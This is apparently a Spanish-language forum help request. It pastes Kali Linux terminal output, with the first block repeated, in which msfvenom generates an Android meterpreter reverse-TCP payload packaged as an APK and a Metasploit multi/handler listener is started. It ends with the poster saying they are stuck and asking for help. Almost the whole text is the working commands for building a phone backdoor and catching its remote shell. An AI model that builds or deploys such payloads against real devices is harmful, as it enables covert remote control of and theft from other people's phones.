PANTALLA 1
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.66 LPORT=4444 R> pruebass.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8811 bytes
PANTALLA 2
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.66
lhost => 192.168.1.66
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.66 LPORT=4444 R> pruebass.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8811 bytes
PANTALLA 2
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.66
lhost => 192.168.1.66
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
- Exploit running as background job 0.
- Started reverse TCP handler on 192.168.1.66:4444
msf exploit(handler) >
Y DE AQUI NO PUEDO PASAR... AYUDENME PORFAVOR